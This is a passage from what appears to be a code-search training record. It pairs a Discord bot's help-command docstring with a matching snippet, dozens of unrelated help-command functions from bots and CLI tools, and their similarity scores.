desc=f\"{cmdInfo['description']}\",\n fields=commandFields,\n webcolor=\"gold\"\n )", "def HelpCommand(self, unused_args, unused_sub_opts=None, unused_headers=None,\n unused_debug=None):\n self.OutputUsageAndExit()", "def print_help():\n\tprint(\"Help text\")", "async def help(self, ctx, *, command: str = None):\n try:\n if command is None:\n p = await HelpPaginator.from_bot(ctx)\n else:\n new_names = {\"Infamous RPG v2\": \"Rpg2\", \"Image Manipulation\": \"Imagem\"}\n if command in new_names.keys():\n command = new_names[command]\n entity = self.bot.get_cog(command) or self.bot.get_command(command)\n\n if entity is None:\n clean = command.replace('@', '@\\u200b')\n return await ctx.send(f'Looks like \"{clean}\" is not a command or category.')\n elif isinstance(entity, commands.Command):\n p = await HelpPaginator.from_command(ctx, entity)\n else:\n p = await HelpPaginator.from_cog(ctx, entity)\n\n await p.paginate()\n except Exception as e:\n await ctx.send(e)", "def do_help(self, arg):\n\t\tif arg:\n\t\t\tfuncarg = arg.replace(\" \", \"_\")\n\t\t\ttry:\n\t\t\t\tfunc = getattr(self, 'help_' + funcarg)\n\t\t\texcept AttributeError:\n\t\t\t\ttry:\n\t\t\t\t\tdoc=getattr(self, 'do_' + funcarg).__doc__\n\t\t\t\t\tif doc:\n\t\t\t\t\t\t\tself.stdout.write(\"%s\\n\"%str(doc))\n\t\t\t\t\t\t\treturn\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tpass\n\t\t\t\tself.stdout.write(\"%s\\n\"%str(self.nohelp % (arg,)))\n\t\t\t\treturn\n\t\t\tfunc()\n\t\telse:\n\t\t\tprint \"\\nAvailable commands (type help <topic> for help on topic):\\n\"\n\t\t\tnames = self.get_names()\n\t\t\tfor name in sorted(names):\n\t\t\t\tif name[:3] == \"do_\":\n\t\t\t\t\tname = name[3:]\n\t\t\t\t\tif name == \"EOF\":\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tself.parent.printHelpLine(name, \"\", getattr(self, \"do_\" + name).__doc__ or \"\")\n\t\t\tprint \"\"", "async def get_help(ctx, commandename=\"\"):\n to_send = \"\"\"\\n> \\n> **Commands List** : \\n\"\"\"\n to_send += \"> \\n\"\n for commande in client.commands:\n to_send += \"> \\n\"\n to_send += f\"\"\"> `!{commande.name}` : {commande.description}\\n\"\"\"\n\n to_send += \"> \\n\"\n to_send += f\"\"\"> _Bot created for the **Ursina** discord server_ \\n\"\"\"\n await ctx.send(content=to_send)", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def help(self) -> str:\n\t\treturn None", "def DoHelp(options, args):\n __pychecker__ = 'unusednames=options'\n if len(args) == 1 and args[0] in COMMAND_USAGE_TEXT:\n print(COMMAND_USAGE_TEXT[args[0]])\n else:\n raise gclient_utils.Error(\"unknown subcommand '%s'; see 'gclient help'\" %\n args[0])", "def help(command = None):\n if command is None:\n option = \" {:12} {}\"\n help_text = [\n \"Usage: tracker <command> [<args>]\",\n \"\",\n \"Available commands:\",\n option.format(\"help\", \"display this dialog\"),\n option.format(\"update\", \"save data to tracker\"),\n option.format(\"list\", \"list available trackers\"),\n option.format(\"show\", \"display raw tracker data\"),\n option.format(\"rename\", \"rename tracker\"),\n option.format(\"delete\", \"remove tracker\"),\n option.format(\"stats\", \"show statistics\"),\n option.format(\"plot\", \"show graph\"),\n \"\",\n \"Use 'tracker help <command>' for a command's detailed usage.\"\n ]\n print(\"\\n\".join(help_text))\n else:\n # commands = [\"update\", \"list\", \"show\", \"rename\", \"delete\", \"stats\", \"plot\"]\n usage = \" {}\"\n desc = \" {}\"\n if command == \"update\":\n help_text = [\n \"Update: command which adds (numerical) data to a tracker.\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker update <tracker> <data>\"),\n usage.format(\"tracker update <tracker>\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker update <tracker> <data>\"),\n desc.format(\"This form is shorthand for saving <data> to \" +\n \"<tracker> for today's date.\"),\n \"\",\n usage.format(\"tracker update <tracker>\"),\n desc.format(\"This form is used to set the value for an \" +\n \"arbitrary date for <tracker>.\"),\n desc.format(\"The date must be in the format YYYY-MM-DD.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the tracker to update, converted to lowercase.\"),\n desc.format(\"If <tracker> does not exist, you will be prompted to create it.\"),\n \"\",\n usage.format(\"<data>\"),\n desc.format(\"The value to save to the tracker to update, must be numerical.\")\n ]\n elif command == \"list\":\n help_text = [\n \"List: displays a list of trackers which have been created\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker list\")\n ]\n elif command == \"show\":\n help_text = [\n \"Show: displays raw dates and values for a tracker\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker show <tracker>\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker show <tracker>\"),\n desc.format(\"Displays all data for <tracker> in the form '<date> | <value>'.\"),\n desc.format(\"Note: <date> is formatted as 'YYYY-MM-DD'.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the tracker to show, converted to lowercase.\"),\n ]\n elif command == \"rename\":\n help_text = [\n \"Rename: change name of a tracker\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker rename <tracker> <new_tracker>\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker rename <tracker> <new_tracker>\"),\n desc.format(\"All <tracker> entries will not be <new_tracker> entries.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the existing tracker to change, converted to lowercase.\"),\n \"\",\n usage.format(\"<new_tracker>\"),\n desc.format(\"The name of the new tracker (must not already exist), converted to lowercase.\")\n ]\n elif command == \"delete\":\n help_text = [\n \"Delete: permanently removes all data entries for a given tracker\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker delete <tracker>\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker delete <tracker>\"),\n desc.format(\"All sqlite entries associated with <tracker> are deleted.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the tracker to delete, converted to lowercase.\")\n ]\n elif command == \"stats\":\n help_text = [\n \"Stats: show statistics for tracker(s)\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker stats <tracker> <tracker>\"),\n usage.format(\"tracker stats <tracker>\"),\n usage.format(\"tracker stats\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker stats <tracker> <tracker>\"),\n desc.format(\"Show correlation coefficient between two trackers.\"),\n \"\",\n usage.format(\"tracker stats <tracker>\"),\n desc.format(\"Display information for each weekday and entire time period.\"),\n desc.format(\"Stats included: total, mean, min, max.\"),\n \"\",\n usage.format(\"tracker stats\"),\n desc.format(\"Displays information about all trackers.\"),\n desc.format(\"Stats included: total entries, entries per tracker.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the tracker to show stats for, converted to lowercase.\")\n ]\n elif command == \"plot\":\n help_text = [\n \"Plot: show graph for tracker\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker plot <tracker>\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker stats <tracker>\"),\n desc.format(\"Displays graph for <tracker> from first entry to last entry.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the tracker to graph, converted to lowercase.\")\n ]\n else:\n error(\"Invalid command: '{}'\".format(command))\n print(\"\\n\".join(help_text))\n sys.exit(1)", "def cmd_help(self, commands=None, usage=False):\n if commands:\n usage = True\n commands = {self.approx.decmd(c.lower()) for c in commands}\n rejects = commands - self.approx.keys()\n for reject in rejects:\n self.put_pretty(\"No command named %r\" % reject)\n continue\n commands -= rejects\n if self.debug:\n assert not any(self.approx.encmd(r) in self.mod_commands for\n r in rejects)\n assert all(self.approx.encmd(c) in self.mod_commands for\n c in commands)\n if not commands:\n return\n requested = zip(commands, (self.approx[c] for c in commands))\n else:\n requested = self.approx.items()\n help = znc.CTable()\n help.AddColumn(\"Command\")\n help.AddColumn(\"Usage\" if usage else \"Description\")\n from itertools import zip_longest\n #\n for command, parser in requested:\n if usage:\n upre = \"usage: %s\" % command\n rest = (parser.format_usage()\n .replace(upre, \"\", 1)\n .replace(\"[-h] \", \"\", 1))\n desc = [l.strip() for l in rest.split(\"\\n\") if l.strip()]\n else:\n desc = [parser.description]\n for line, comm in zip_longest(desc, (command,), fillvalue=\"\"):\n help.AddRow()\n help.SetCell(\"Command\", comm)\n help.SetCell(\"Usage\" if usage else \"Description\", line)\n #\n s_line = znc.String()\n strung = []\n while help.GetLine(len(strung), s_line):\n strung.append(s_line.s)\n also = \" (<command> [-h] for details)\"\n strung[1] = strung[1].replace(len(also) * \" \", also, 1)\n self.put_pretty(\"\\n\".join(strung))", "async def help(message, *args, **kwargs):\r\n\r\n if not args:\r\n docs = {name: f.__doc__ for name, f in usercommands.items()}\r\n docs = {k:v.split(\"\\n\",1)[0] for k,v in docs.items() if v and k.startswith(prefix)}\r\n output = dictstr(docs) + f\"\\nType \\\"{prefix}help func\\\" for detailed information about func\"\r\n output += \"\\n\\nFunction arguments are words separated by spaces\\n ex. $sort enemydata HP\"\r\n output += \"\\nKeyword arguments have the format: key=value\\n no spaces, unless value is in quotes\"\r\n output += \"\\n\\nDataTables:\"\r\n for name in DataTables:\r\n output += \"\\n \" + name\r\n if name == \"enemydata-h\": output += \" (hard-mode stats)\"\r\n await reply(message, f\"```{output}```\")\r\n return\r\n await reply(message, f\"```{inspect.getdoc(usercommands['$'+args[0]])}```\")", "def quick_test():\n do_command('Help: Command=Help')\n do_command('Help: Command=\"GetInfo\"')\n #do_command('SetPreference: Name=GUI/Theme Value=classic Reload=1')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(messages.HELP_TEXT)", "async def help(ctx, *, command: str = None):\n try:\n if command is None:\n p = await HelpPaginator.from_bot(ctx)\n else:\n entity = bot.get_cog(command)\n if entity is None:\n clean = command.replace('@', '@\\u200b')\n return await ctx.send(f'Command or category \"{clean}\" not found.')\n elif isinstance(entity, commands.Command):\n p = await HelpPaginator.from_command(ctx, entity)\n else:\n p = await HelpPaginator.from_cog(ctx, entity)\n\n await p.paginate()\n except Exception as e:\n await ctx.send(e)", "async def help(self, msg, *args, intro=None):\n sudo = Guard.allow_sudo(msg)\n if intro is not None:\n intro = f'{intro.strip()} '\n else:\n intro = ''\n if msg.channel.type == discord.ChannelType.private:\n nick = '@DayRInfo'\n else:\n nick = f'@{msg.channel.guild.me.nick}'\n content = f'{intro}I understand the following commands (tag me at the start of the message):\\n'\n for command, (args, desc, enabled, delay) in Controller.commands.items():\n if not sudo and not enabled:\n continue\n if args:\n args = f' {args.strip()}'\n if desc:\n desc = f'\\n\\t{desc}'\n content = f'{content}`{Controller.HELP_KEY}{command}{args}`{desc}\\n'\n content = f'{content}----------\\n'\n content = f'{content}• Also, if you tag this bot ({nick}) on a message containing a link to the interactive Day R map 🗺️ with a location URL, I will send you a snapshot of the location.\\n'\n content = f'{content}• React with ❌ to any of my messages to delete it (if I still remember that it was my message). You can only delete my messages that are directed to you.'\n await msg.author.send(**{\n 'content': content,\n })\n await msg.channel.send(**{\n 'content': 'Command list sent via DM!',\n 'reference': msg.to_reference(),\n 'mention_author': True,\n 'delete_after': 3,\n })", "def do_help():\n return True, \"\"\"I can understand these commands:\nOFF - Shut down robot\nHELP - provide information about commands\nFORWARD - move forward by specified number of steps, e.g. 'FORWARD 10'\nBACK - move backward by specified number of steps, e.g. 'BACK 10'\nRIGHT - turn right by 90 degrees\nLEFT - turn left by 90 degrees\nSPRINT - sprint forward according to a formula\n\"\"\"", "def help(update, context):\n update.message.reply_text(\"\"\"THESE ARE THE COMMANDS\n /hi\n /gokul\n /bala\n /competition\n /form\n \"\"\")", "async def help(self, ctx, *, command: str = None):\n try:\n if command is None:\n p = await HelpPaginator.from_bot(ctx)\n else:\n entity = self.bot.get_cog(command) or self.bot.get_command(command)\n\n if entity is None:\n clean = command.replace('@', '@\\u200b')\n return await ctx.send(f'Command or category \"{clean}\" not found.')\n elif isinstance(entity, commands.Command):\n p = await HelpPaginator.from_command(ctx, entity)\n else:\n p = await HelpPaginator.from_cog(ctx, entity)\n\n await p.paginate()\n except Exception as e:\n await ctx.send(e)", "def print_help(self):\n print self.get_help()", "def helpme(self):\n\n print(\"{}{}{}\".format(' ', 'Commands', ' '))\n print(\"{}{}{}\".format(' ', '--------', ' '))\n print(\"{} {} {}\".format('help ', '|', 'Display all usable commands'))\n print(\"{} {} {}\".format('look ', '|', 'Explore the room to find current location, exits and potential items.'))\n print(\"{} {} {}\".format('go ', '|', 'The prefix required to navigate your player.'))\n print(\"{} {} {}\".format('get ', '|', 'The prefix for picking up items.'))\n print(\"{} {} {}\".format('drop ', '|', 'The prefix for dropping items.'))\n print(\"{} {} {}\".format('inv ', '|', 'Displays the player inventory'))\n print(\"{} {} {}\".format('health ', '|', 'Displays player health'))\n print(\"{} {} {}\".format('eat ', '|', 'Allows the player to use consumables to gain health'))\n print(\"{} {} {}\".format('equip ', '|', 'Equip a weapon in your inventory'))\n print(\"{} {} {}\".format('unequip', '|', 'Unequip a current weapon'))\n print(\"{} {} {}\".format('attack ', '|', 'Allows the player to attack a non-player'))\n print(\"{} {} {}\".format('push ', '|', 'Returns NPC to spawn'))\n print(\"{} {} {}\".format('save ', '|', 'Save current player progress'))\n print(\"{} {} {}\".format('load ', '|', 'Load a previous character'))", "def initialize_help_commands(self) -> None:\n\n @self.command(name=\"help\")\n @logger(\"all\")\n async def help_command(ctx, *args):\n if len(args) == 0:\n await ctx.message.channel.send(indie_help.summary())\n else:\n await ctx.message.channel.send(indie_help.specific(args))", "def do_help(self, line):\n Cmd.do_help(self, line)", "def channel_help(message):\n message.reply(Strings['HELP'].format(config.HELP_URL))" ]
[ "0.8511808", "0.8454938", "0.83023393", "0.82100123", "0.8172162", "0.8119534", "0.8045609", "0.7997151", "0.79934657", "0.79888207", "0.7869247", "0.7839074", "0.7831564", "0.7807893", "0.7801458", "0.77975965", "0.77936643", "0.7725134", "0.76936215", "0.7667932", "0.7667932", "0.76497036", "0.76497036", "0.7628276", "0.7610771", "0.75922734", "0.75838995", "0.758352", "0.7563916", "0.7556451", "0.755237", "0.75399286", "0.7539473", "0.7525681", "0.75214773", "0.7514472", "0.75070816", "0.7498093", "0.748434", "0.7472967", "0.745708", "0.7456372", "0.7448633", "0.7441096", "0.74235225", "0.742008", "0.741299", "0.74123985", "0.74046856", "0.7401341", "0.73991734", "0.73990095", "0.73945934", "0.73850703", "0.7384522", "0.73833996", "0.7372972", "0.7372972", "0.73705924", "0.7369859", "0.73683614", "0.73671097", "0.73603016", "0.73593056", "0.7333431", "0.733177", "0.733177", "0.733177", "0.733177", "0.73265743", "0.7319092", "0.73185515", "0.7303384", "0.72921866", "0.7282114", "0.7278147", "0.72738814", "0.72723234", "0.7265674", "0.726526", "0.72568154", "0.7256574", "0.72528225", "0.72528225", "0.7251022", "0.72443396", "0.72423077", "0.72289395", "0.7228725", "0.7226511", "0.7218349", "0.7213249", "0.7212109", "0.72093403", "0.72060156", "0.71885115", "0.71863073", "0.7174839", "0.7161957", "0.71515167", "0.7147234" ]
0.0
-1
Type !help command for additional info on a command. You can also type !help category for additional info on a category. For example, type !help Level (If you have the level plugin enable!)
async def category(self,ctx): await ctx.send("Yes this is a category.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def help_help(self):\n print(\"List commands or print details about a command\")", "def command_help(self, command):\n self.commands[command].command_help()", "def _help(self):\n self.onecmd('help')", "def cmd_help(args):", "def help():\n \n pass", "def help():", "def command_help(self, *args, **kwargs):\n print(\"Commands available:\\n\")\n for name in dir(self):\n if not name.startswith(\"command_\"):\n continue\n name_clean = name[len(\"command_\"):]\n print(\"%s:\\n - %s\\n\" % (name_clean, getattr(self, name).__doc__.strip()))", "def do_command_help(self, command):\n summary = self.base.commands[command].get_summary()\n usage = self.get_command_usage(command)\n description = self.base.commands[command].get_description()\n sys.stdout.write('%s\\n%s' % (summary, usage))\n if description != None:\n sys.stdout.write('Arguments Description:\\n%s\\n' %\n (description, ))", "def help():\n print(UI.HELP)", "def help(self):\r\n self._short_help(None, None, None, None)", "def cmd_help(ctx):\n echo(ctx.parent.get_help())", "def show_help():\n pass", "async def help(self, ctx):\n self.log_command_call(\"help\", ctx.message)\n await ctx.send(HELP_TEXT)\n embed_output = create_embed(description=MORE_INFO_TEXT)\n await ctx.send(embed=embed_output)", "async def _help(ctx, *, command_name: str=None):\n if command_name:\n command = bot.get_command(command_name)\n if not command:\n return await ctx.send(\"No such command!\")\n return await ctx.send(f\"```\\n{ctx.prefix}{command.name} {command.signature}\\n\\n{command.help or 'Missing description'}```\")\n description = []\n for name, cog in bot.cogs.items():\n entries = [\" - \".join([cmd.name, cmd.short_doc or \"Missing description\"]) for cmd in cog.get_commands() if await _can_run(cmd, ctx) and not cmd.hidden]\n if entries:\n description.append(f\"**{name}**:\")\n description.append(\"• \" + \"\\n• \".join(entries))\n await ctx.send(embed=discord.Embed(description=\"\\n\".join(description), color=ctx.me.color))", "def help(command=None):\n if command is None: \n # print first line of docstring\n for cmd in commands:\n ds = commands[cmd].__doc__.split('\\n')[0]\n print \"%-16s %s\" % (cmd,ds)\n else:\n print commands[command].__doc__", "def help(self):", "def help(self):", "def help(self):\n pass", "def help(self):\n pass", "def command_help(self):\n print(\"Command \", self)\n print(\"\\t\\thelp (Get help for command)\")\n\n params = self.params.copy()\n del params[\"help\"]\n\n if len(params) == 0:\n print(\"This command has no parameters\")\n return\n\n print(\"Parameters:\")\n for info in params.values():\n print(\" %s\" % info.get_basic_info())\n description = info.get_desc()\n if description != \"\":\n print(textwrap.fill(description,\n initial_indent=\" \",\n subsequent_indent=\" \",\n width=70))", "def help():\n print \"Help comes to those who ask\"", "def help_command(server, output, conf):\n server.tell(output.name, 'Available commands:')\n for key in COMMANDS.keys():\n cmd_func = COMMANDS[key]\n if cmd_func.__doc__:\n server.tell(output.name, '%s: %s' % (key[1:], cmd_func.__doc__))\n else:\n server.tell(output.name, key[1:])\n return", "def help(ctx):\n click.echo(ctx.parent.get_help())", "def help(ctx, topic, **kw):\n # The help command implementation is taken from\n # https://www.burgundywall.com/post/having-click-help-subcommand\n if topic is None:\n click.echo(ctx.parent.get_help())\n else:\n click.echo(main.commands[topic].get_help(ctx))", "def print_generic_help():\r\n print ART_NAME\r\n print 'Version {1}\\nby {2}'.format(NAME, VERSION, AUTHOR)\r\n print DESCRIPTION\r\n tools = sorted(AvailableCommands.commands.keys(), key=lambda v: v.upper())\r\n # Do not show CUSTOM command in the help\r\n tools.remove('CUSTOM')\r\n tools.remove('CUSTOM_NO_OUTPUT')\r\n print '\\n\\nSupported tools are:\\n{0}'.format('\\n'.join(tools))\r\n print '\\nHint: Check tool specific help with --help <tool_name>\\n'", "def help_command(update, context):\n update.message.reply_text('Help!')", "async def help(self, *args, **kwargs):\n if len(args) == 0:\n return self.help.__doc__\n docs = []\n for command in args:\n if command in self.user_special_bang_set:\n docs.append(self.user_special_bang_set[command].bang_skill.__doc__)\n elif command in self.control_bang_set:\n docs.append(self.control_bang_set[command].bang_skill.__doc__)\n\n return \"| \".join(docs)", "def help_command(update, context):\n update.message.reply_text('Let me help you. \\r\\n /help print this help \\r\\n /safety prints safety instructions \\r\\n /play start the game\\r\\n /joingroup Join CTF tg group')", "def command_help(self, bot, update):\n\n messages = [\n 'Available commands:',\n '/who - Who is Myles?',\n '/where - Where is Myles?',\n '/tweet - What was the last tweet Myles sent?',\n '/photo - What was the last Instagram photo Myles took?',\n '/web - Where can I find Myles on the interwebs?',\n ]\n\n self.send_messages(bot, update, messages)", "def do_help(self, command_name):\n if not command_name:\n print _PVBlotInterp.__doc__\n print \"The following commands are supported:\"\n print \" \",\n blotish_commands = self._blotish_commands.keys()\n blotish_commands.sort()\n for c in blotish_commands:\n print c,\n print\n print\n print \"For more information on any command, try help <command>.\"\n return\n try:\n command = self.get_unique_command(command_name)\n print command.__doc__\n except blotish.BlotishError, err:\n blot_common.print_blot_error(err)", "def printhelp():", "def display_help(self):\n pass", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help(self, msg=None):\n\n # Print the message if given.\n if not msg == None:\n print str(msg) + \"\\n\"\n\n # Display the list of commands, in the alphabetical order.\n print \"Use one of the following commands:\"\n for action in sorted(self.actions.keys()):\n info = self.actions[action]\n joined_oblig = ' '.join(info['required'])\n if len(info['additional']) > 0:\n add = [\"<%s>\" % x for x in info['additional']]\n joined_add = '[' + ' '.join(add) + ']'\n else:\n joined_add = ''\n print \"\\t* %s %s %s\" % (action, joined_oblig, joined_add)", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\r\n update.message.reply_text('Help!')", "def help(self):\n\t\treturn", "async def do_help(self, arg):\n if arg:\n if arg in self._commands:\n _, doc = self._commands[arg]\n print(doc)\n else:\n self.error('No command {}'.format(arg))\n else:\n print('Valid commands:')\n for c in self._commands:\n print(' ' + c)", "def print_specific_help(tool_name):\r\n if tool_name not in AvailableCommands.commands:\r\n print 'Command is not supported: {0}'.format(tool_name)\r\n return\r\n cmd = AvailableCommands.commands[tool_name]\r\n\r\n print 'Usage of {0}:'.format(cmd.name)\r\n print '\\nAccepted input types:\\n{0}'.format(str(list(cmd.input_types)))\r\n print '\\nOutput types:\\n{0}'.format(str(cmd.output_types))\r\n print '\\nMandatory arguments:\\n{0}'.format(str(cmd.user_mandatory_args))\r\n print '\\nOptional arguments:\\n{0}'.format(str(cmd.user_optional_args))\r\n print '\\nParallelizable:\\n{0}'.format(str(cmd.parallelizable))\r\n print '\\nAdditional description:\\n{0}'.format(str(cmd.help_description))\r\n print ''", "def help(cmd, cmdArgs):\n global commandDict\n retInfo = []\n if len(cmdArgs) > 0:\n #return help on a single function\n if cmdArgs[0] in commandDict.keys():\n return commandDict[cmdArgs[0]].__doc__\n\n #else, return general info\n retInfo = ['pypeople: A command line tool for vCard management',\n 'Version:' + __version__,\n 'Available Commands:']\n #fill in more info here\n for cmdName in commandDict.keys():\n cmdFunc = commandDict[cmdName]\n cmdDoc = str(cmdName) + ': ' + str(cmdFunc.__doc__) if cmdFunc.__doc__ is not None else 'Undocumented Function'\n retInfo.append('\\t' + cmdDoc)\n\n return '\\n'.join(retInfo)", "async def help(self, ctx, *, command_name: str=None):\n bot_prefix = '@Randy '\n # Shortcut to command search\n if command_name is not None:\n return await ctx.invoke(self.cmd('help command'), cmd_name=command_name)\n\n em = discord.Embed(title='Help',\n description='**Permissions:** The permissions required to function :-\\n'\n '`Send Messages`, `Manage Messages`, `Embed Links`\\n'\n '--\\nTo get help or more information on a specific command, use:\\n'\n '`{bot_prefix}help <command name>`\\n'\n '--\\nRead my messy code [here](http://github.com/xKynn/RandomRumble)'\n '--\\nIf you like my work and would like to help me, '\n 'Ko-Fi/Paypal: [Link](https://ko-fi.com/D1D6EXXV)\\n',\n color=self.color)\n\n em.set_footer(text=\"Contact me at Demo#7645\")\n\n # This can't go in the init because help isn't loaded last & thus misses some commands\n em.add_field(name=\"Commands\", value=' • '+'\\n • '.join(f\"***{c.name}*** - {c.short_doc}\" for c in self.bot.commands if\n c.name not in ['pob', 'link', 'convert']))\n try:\n await ctx.send(embed=em)\n except:\n await ctx.send(\"`Embed Links` permission is required to see the help!\")", "def test_cli_help(self):\n output = self.update_command('-h')", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text(\"These are the list of commands supported. \\n\\n /deadlines. \\n\\n \"\n \"Hey! I am still being enhanced, more features to come...!\")", "def command_help(args):\n\tprint_usage()\n\treturn 0", "def help_command(update: Update) -> None:\n #update.message.reply_text('Help!')", "async def do_help():\n\n if len(message.content.split()) > 1:\n for i in cmd_dict:\n if message.content.split()[1] == i:\n await bot.send_message(c, f'Help for {i}: {cmd_dict[i].__doc__}')\n return\n\n cmdstr = 'Commands: '\n for i in cmd_dict:\n cmdstr += '{}, '.format(i)\n await bot.send_message(c, cmdstr)", "def get_command_help(self, module_name, command_name):\r\n command = self.env.get_command(module_name, command_name)\r\n\r\n default_format = 'raw'\r\n if sys.stdout.isatty():\r\n default_format = 'table'\r\n\r\n arg_doc = command.__doc__\r\n\r\n if 'confirm' in command.options:\r\n arg_doc += \"\"\"\r\nPrompt Options:\r\n -y, --really Confirm all prompt actions\r\n\"\"\"\r\n\r\n if '[options]' in arg_doc:\r\n arg_doc += \"\"\"\r\nStandard Options:\r\n --format=ARG Output format. [Options: table, raw] [Default: %s]\r\n -C FILE --config=FILE Config file location. [Default: ~/.softlayer]\r\n --debug=LEVEL Specifies the debug noise level\r\n 1=warn, 2=info, 3=debug\r\n --timings Time each API call and display after results\r\n --proxy=PROTO:PROXY_URL HTTP[s] proxy to be use to make API calls\r\n -h --help Show this screen\r\n\"\"\" % default_format\r\n return arg_doc.strip()", "def print_help(self):\n\n print((\"Help is not defined for command \" + self.command))", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Laughybot\\n\\n VERSION\\n 0.1 \\n\\nUSAGE\\n /{command} : Entrer une commande parmi celles disponibles\\n\\nCOMMADES\\n/joke => recherche une blague sur la toile\\n/start => Affiche le message d'accueil\\n/help => Affiche l'aide\")", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(messages.HELP_TEXT)", "def get_help(self) -> None: \n print(messages.get_help())", "def Help(topic=None):\n\n if not topic:\n print \"Avaliable commands are: \"\n print \"\\n\".join(map(lambda x:\" \"*3+x, filter(lambda c:c!=\"help\", commands)))\n print \"Type help command to get help with a specific command.\"\n\n elif topic in commands:\n print \"Help for %s:\"%topic\n print commands[topic].__doc__", "def dispatch_help(args):\n command = args.subcommand\n if command is None:\n command = 'help'\n args.parsers[command].print_help()\n\n cmd_func = getattr(EtcMaint, 'cmd_%s' % command, None)\n if cmd_func:\n lines = cmd_func.__doc__.splitlines()\n print('\\n%s\\n' % lines[0])\n paragraph = []\n for l in dedent('\\n'.join(lines[2:])).splitlines():\n if l == '':\n if paragraph:\n print('\\n'.join(wrap(' '.join(paragraph), width=78)))\n print()\n paragraph = []\n continue\n paragraph.append(l)\n if paragraph:\n print('\\n'.join(wrap(' '.join(paragraph), width=78)))", "def help(self) -> str:\n\t\treturn None", "async def send_command_help(self, command):\n ctx = self.context\n embed = discord.Embed(title=command.name.upper(), description=command.description, color=discord.Color.green())\n alias = command.aliases\n if alias:\n embed.add_field(name=\"Aliases\", value=\", \".join(alias), inline=False)\n if command.usage != None:\n embed.add_field(name=\"How to use:\", value=f'`{command.usage}`')\n\n await ctx.reply(embed=embed)", "def _help():\n text = \"\"\"\n```\nUsage: @bot [command] (message)\n\n*Commands*:\n \n add Adds specified users to notify list | To add yourself use key 'myself'\n list Lists users on notify list\n remove Removes specified users from notify list | To remove yourself use key 'myself'\n help This help\n\n > Obs: All commands are optional\n\n*Examples*:\n\n @bot add myself @Fulano <= Will add yourself and @Fulano in list.\n @bot this a messge test <= Send 'this a messge test' to all list.\n @bot remove myself @Fulano <= Remove yourself and @fulano from list.\n\n```\n\"\"\"\n return text", "def do_help(self, args): \n if args.command:\n if len(args.command) > 1:\n command = args.command[0] +\"-\" + args.command[1]\n else:\n command = args.command[0]\n if command in self.subcommands:\n self.subcommands[command].print_help()\n else:\n print((\"'%s' is not a valid subcommand\") %\n args.command)\n else:\n self.parser.print_help()", "def print_help():\n\tprint(\"Help text\")", "def help(update, context):\n update.message.reply_text(\"\"\"usage \n /bus <bus name> or /bus <bus name> <stop name>\n /addstop <stop name> <stop code>\n /delstop <stop name>\n /showstops\n /help\n \"\"\")\n\n # log info\n logger.info(\"help used username:{0}\".format(update.message.from_user.username))", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def print_help(self):\n print self.get_help()", "def do_help(self, line):\n Cmd.do_help(self, line)", "def show_help(self):\n self.slack.reply('\\n\\n'.join(self.help_lines))", "def help(self, args):\n print('No commands available for this consumer')", "def help_util():\r\n for cmd, f in COMMANDS.items():\r\n print(\"POM \" + cmd + \":\")\r\n print(f.__doc__.lstrip(\"\\n\"))", "def help(self) -> str:\n raise NotImplementedError", "def do_help(self, arg):\n if arg:\n # Getting help for a specific command\n funcname = self._func_named(arg)\n if funcname:\n # No special behavior needed, delegate to cmd base class do_help()\n cmd.Cmd.do_help(self, funcname[3:])\n else:\n # Show a menu of what commands help can be gotten for\n self._help_menu()", "async def help_command(self, ctx, *, cmd_name: str=None):\n bot_prefix = '@Randy '\n # Get command object\n cmd_obj = self.cmd(cmd_name)\n\n # Handle no command found\n if cmd_obj is None:\n return await ctx.error(f'Command {cmd_name} not found')\n em = discord.Embed(title=cmd_obj.name, description=cmd_obj.help, color=self.color)\n\n # Input aliases and parameters to embed\n if cmd_obj.aliases:\n em.add_field(name='Aliases', value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.aliases]))\n if cmd_obj.clean_params:\n em.add_field(name='Parameters', value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.clean_params]))\n\n # Handle group commands\n if isinstance(cmd_obj, commands.core.Group):\n 